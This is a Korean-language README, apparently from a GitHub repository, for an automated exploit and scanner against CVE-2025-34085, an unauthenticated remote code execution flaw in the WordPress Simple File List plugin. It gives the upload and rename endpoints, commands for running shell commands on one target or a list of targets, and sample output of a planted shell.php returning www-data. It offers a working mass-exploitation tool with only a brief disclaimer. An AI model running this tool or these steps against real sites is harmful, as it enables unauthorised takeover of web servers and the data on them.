
WordPress Simple File List 인증되지 않은 원격 코드 실행 취약점
CVE-2025-34085에 대한 자동화된 익스플로잇 및 스캐너로, WordPress Simple File List 플러그인의 심각한 취약점으로, 임의 파일 업로드 및 이름 변경 기능을 통해 인증되지 않은 원격 코드 실행을 가능하게 합니다.
인증되지 않은 파일 업로드
/wp-content/plugins/simple-file-list/ee-upload-engine.phpPHP 확장자로 이름 변경
.php 또는 유사한 확장자로 이름 변경 (다음을 통해):/wp-content/plugins/simple-file-list/ee-file-engine.php페이로드 실행
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
targets.txt 파일에 대상 URL을 한 줄에 하나씩 입력한 후 실행:
python3 CVE-2025-34085.py --cmd "whoami"
| 인수 | 설명 |
|---|---|
-u | 대상 URL (예: http://example.com) |
--cmd | 원격 셸에서 실행할 명령 (기본값: id) |
--inline | 인라인 페이로드 사용 (?cmd= 매개변수 없음) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
성공한 대상은 vuln.txt에 저장됩니다.
CVE-2025-34085.py — 주 익스플로잇 스크립트targets.txt — (선택 사항) 대상 도메인 목록vuln.txt — 성공한 익스플로잇 로그관리자는 다음을 수행해야 합니다:
이 프로젝트는 교육 및 승인된 테스트 목적으로만 사용됩니다. 작성자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다.
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 📄 전체 라이선스 텍스트 보기
0xgh057r3c0n 🔗 GitHub: github.com/0xgh057r3c0n